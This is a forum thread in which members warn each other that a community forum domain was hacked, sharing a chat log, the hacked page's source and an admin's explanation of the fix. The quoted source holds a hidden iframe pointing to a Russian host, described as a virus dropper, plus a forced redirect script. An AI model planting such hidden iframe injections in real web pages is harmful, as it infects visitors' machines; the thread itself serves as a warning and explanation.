Clicky

Jump to content
Jester Spearmann

Nexii's Forum Comprimised?

Recommended Posts

This was sent to me by tuomy

[4:16] Tuomy Boa: who has access to ordoimperialis.com?

[4:17] Jester Spearmann: uhhh everyone o.o it's a public website ;p

[4:17] Jester Spearmann: why

[4:17] Tuomy Boa: i mean who could make the domain reroute to vanguards homesite? try nexii.ordoimperialis.com

[4:17] Jester Spearmann: o.O

[4:18] Jester Spearmann: it was hacked by russians apparantly

[4:18] Jester Spearmann: scan your system, NOW

[4:18] Jester Spearmann: it's a virus dropper

[4:18] Tuomy Boa: Nopes, its not by Russians this time

[4:18] Jester Spearmann: FFFF

[4:19] Tuomy Boa: Someone with access to domain made the domain reroute all people to Vanguards forums

[4:20] Tuomy Boa: the russians thing happened few weeks ago

[4:22] Jester Spearmann: mind if i copypaste this to the forum as a warning /

[4:22] Jester Spearmann: ? *

[4:24] Tuomy Boa: go ahead

[4:25] Tuomy Boa: id try contact whoever owns ordoimperialis.com and tell them to change the passes

[4:25] Jester Spearmann: Thanks, intus has been informed

I checked and the page tries to download a virus to your system

[4:22] Vinnie Lei (COM): Page source; <html>

<body><iframe src=&quot;http://q5x.ru:8080/index.php" width=111 height=137 style="visibility: hidden"></iframe>

<script type="text/javascript"><!--

setTimeout('Redirect()',1);

function Redirect()

{

location.href = 'http://www DOT vanguardarmedforces DOT com/forums/index DOT php';

}

// --></script>

</body

Yes I deliberately broke the coding so as not to actually make it a full html setup in the quote

The iframe is the worm dropper, see attached screenshot

Link to comment
Share on other sites

I made nexii.ordoimperialis.com redirect to Vanguard's website a few days ago because I thought it was them that hacked it (would have been extremely funny to see them hack themselves lol). Turns out Nexii's website was not hacked by Vanguard, but infact hacked by a random unaffiliated to SL hacking group. I fixed Nexii's website, and it was hacked again by that hacking group. I fixed it a third time, then it was again hacked last night by the hacking group. That line is the virus dropper, they do it to all the PHPBB3 forums they hack. I removed the line.

The random hacking group continue to hack his website, they know when I change it. They will probably do it again. If you're using firefox 3.0, you'll be fine and won't get a virus, it automatically blocks the virus dropper. Most other browsers warn you, as long as you say "NO" and not "YES" you won't get a virus (lol).

Safest thing is to not go to nexii.ordoimperialis.com until I get the directory deleted.

Link to comment
Share on other sites

Update:

nexii.ordoimperialis.com was taken offline. I'm beginning to think it damned well could have been Vanguard that hacked it. Oh well, there's no way we'll ever know. Thread open for discussion.

And also, to clarify for the future, posting HTML is fine; it will do nothing (I disabled it)

Link to comment
Share on other sites

Worm is a worm, its more an issue of how that thing got there in the first place. Any way to tell the IP of the one who modified it last to see?

Also, how do you get noscript to work in Firefox anyway?

A team or individual modified the output PHP script of index.php to, rather than show the forum listing as normal, to instead do an <iframe> with a website which attempts to inject the malicious software. It's technically not "there", it's just indirectly "there".

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×

Important Information

By using this site, you agree to our Privacy Policy, and Terms of Use.